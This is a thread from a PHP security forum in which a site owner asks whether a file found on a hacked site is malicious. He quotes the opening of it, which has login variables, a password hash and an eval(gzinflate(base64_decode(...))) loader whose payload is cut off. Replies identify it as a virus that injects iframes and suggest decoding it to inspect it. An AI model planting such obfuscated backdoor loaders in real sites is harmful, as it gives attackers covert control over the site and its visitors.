Board index   FAQ   Search  
Register  Login
Board index php forum :: PHP and MySQL Security PHP & MySQL Security

Is this code genuine or a hack??

Security issues related to php and mysql usage. How to make your code secure? Security measures and configurations? It's all in here!

Moderators: macek, egami, gesf

Is this code genuine or a hack??

Postby brm » Thu Nov 04, 2010 10:14 pm

09_50_56_a.php Found this in my website file manager.

I don't regonise it. When I veiw the code I get this....

<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs....................................

It goes on forever.

The site was hacked by Phishing scheme types which led me to find the above amongst lots of others.

Don't want to delete it until I am sure it is not required.....Seems very sus to me.....


Thanks Ben.
brm
New php-forum User
New php-forum User
 
Posts: 1
Joined: Thu Nov 04, 2010 10:07 pm

Re: Is this code genuine or a hack??

Postby egami » Fri Nov 05, 2010 4:08 am

Looks fishy to me.
User avatar
egami
php-forum GURU
php-forum GURU
 
Posts: 2196
Joined: Wed Oct 06, 2010 11:19 am
Location: Happy Valley, UT

Re: Is this code genuine or a hack??

Postby Adroitly » Sat Nov 13, 2010 12:17 am

Bit random...decode it!
Adroitly
New php-forum User
New php-forum User
 
Posts: 19
Joined: Fri Nov 12, 2010 8:23 pm

Re: Is this code genuine or a hack??

Postby Suhoij » Thu Jun 16, 2011 6:01 am

This is the virus. It's generate javascript iframe. You can look at the code - write echo instead of eval.
Suhoij
New php-forum User
New php-forum User
 
Posts: 92
Joined: Tue Aug 17, 2010 2:00 am
Location: Ukraine Kharkov


Return to PHP & MySQL Security

Who is online

Users browsing this forum: No registered users and 1 guest

Sponsored by Sitebuilder Web hosting and Traduzioni Italiano Rumeno and antispam for cPanel.